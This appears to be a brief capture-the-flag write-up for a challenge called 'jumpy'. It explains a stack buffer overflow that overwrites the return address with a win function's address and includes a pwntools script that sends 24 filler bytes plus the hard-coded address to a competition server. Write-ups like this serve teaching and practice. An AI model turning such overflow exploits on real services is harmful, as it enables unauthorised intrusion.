This challenge was two parts, the first part was overflowing the buffer of size, and the second part was overwriting the return address with the address of winrar. Since there was no alsr and we are given the binary, the address can be hard coded.
The size needed to prime fill the stack up to the return address was
24 , so we sent 24 A's and the return address
from pwn import * import time context(arch='amd64', os='linux') context.log_level = True binary = ELF('jumpy') competition = True if competition: conn = remote("wcscctf.org", 8484) else: conn = remote('localhost', 1234) def getInput(): print conn.recvline() def sendPayload(): #no aslr winAddress = p64(0x400636) filler = 'a'*24 payload = filler + winAddress #test the payload in gdb to see if it overwrote registers with open('payload', 'w') as f: f.write(payload) conn.sendline(payload) time.sleep(1) print conn.recvline() + conn.recvline() if __name__ == "__main__": getInput() sendPayload()